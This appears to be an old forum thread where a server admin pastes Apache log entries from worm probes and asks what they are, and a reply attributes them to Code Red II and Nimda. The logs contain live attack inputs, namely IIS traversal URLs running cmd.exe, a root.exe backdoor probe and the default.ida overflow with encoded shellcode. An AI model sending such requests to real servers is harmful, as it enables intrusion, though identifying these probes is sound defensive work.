Ok, I am used to getting the nimda crap constantly in my access_log, but now I am getting this too:


12.230.20.57 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%25%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
12.230.20.57 - - [14/Oct/2002:06:07:25 -0700] "GET /scripts/..%252f../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
62.46.213.7 - - [14/Oct/2002:08:25:10 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9 090%u6858%ucbd3%u7801%u9090%u6
858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u909 0%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-"
12.230.129.255 - - [14/Oct/2002:10:31:33 -0700] "GET /scripts/root.exe?/c+dir HT
TP/1.0" 404 281 "-" "-"
12.230.129.255 - - [14/Oct/2002:1



What are all of those NNN's? This same line repeats over and over in my log file. Is this another virus?

Looks like someone's checking your server if you're running apache on windows, check out the directories in the paths.

Attempts to reach default.ida are probably the Code Red II worm. If you ever see attempts to run .exe files its probably Nimbda.